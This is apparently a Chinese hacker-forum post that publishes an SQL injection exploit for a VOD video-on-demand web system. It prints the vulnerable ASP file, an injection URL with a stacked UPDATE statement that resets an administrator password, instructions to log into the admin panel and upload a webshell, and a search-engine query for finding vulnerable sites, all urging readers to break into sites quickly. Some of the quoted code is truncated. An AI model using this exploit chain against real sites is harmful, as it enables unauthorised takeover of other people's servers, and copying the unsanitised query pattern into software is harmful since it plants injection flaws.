天天看点

狂汗!VOD点播系统漏洞解析,入侵电影网站!

哎!!!VOD 点播系统的致命漏洞,又要又很多的电影网站完蛋了。。。。。

偶是偶然看见的,嘿嘿,现在再网上你是很难找到的哦。。。。

貌似现在只流传再内部,不过好多的网站已经修补了,毕竟破坏力比较大哦。。。

嘿嘿,下面就给大家看点好东西哦,,,

漏洞文件webmedia/common/function/xtree.asp

〈!--#include file="../dbcon.inc.asp" -->

〈%

iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session

("VODAdmin")) > 0 then

szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &

iNode_ID

else

szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &

end if

rsData.Open szSQL,con,1,3

szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"

do while not rsData.EOF

szRetVar = szRetVar & "<TypeInfo>"

szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"

szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"

szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"

szRetVar = szRetVar & "</TypeInfo>"

rsData.MoveNext

loop

szRetVar = szRetVar & "</Root>"

rsData.Close

Response.CharSet = "GB2312"

Response.C

Response.Expires = -1

Response.Write szRetVar

%>

〈!--#include file="../dbend.inc.asp" -->

很容易看出以上存在着DB权限注入

注射地址:[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1[/url]

表段名:customer

构造函数 把admin的pass改成fuck

[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20Userfuck=[/url]'633f94d350db34d5'%20where%20UserName='fuck'

登陆后台[url]http://WWWW.XXXXX.COM/webmedia/admin/default.asp[/url] 直接上传大马 完事!

测试方法:在google baidu搜:    inurL:webmedia/      随便找个站都可以入侵

官方地址:[url]http://www.viewgood.com/[/url]

速度去看看了,。。。。  嘿嘿,小黑们,你们又发了哦。。。

上面说的第一个是注射地址,,,,

第二个是 添加一个 FUCK 密码 FUCK的管理员,。。。。。。

嘿嘿,,,,,速度去了,。。。。。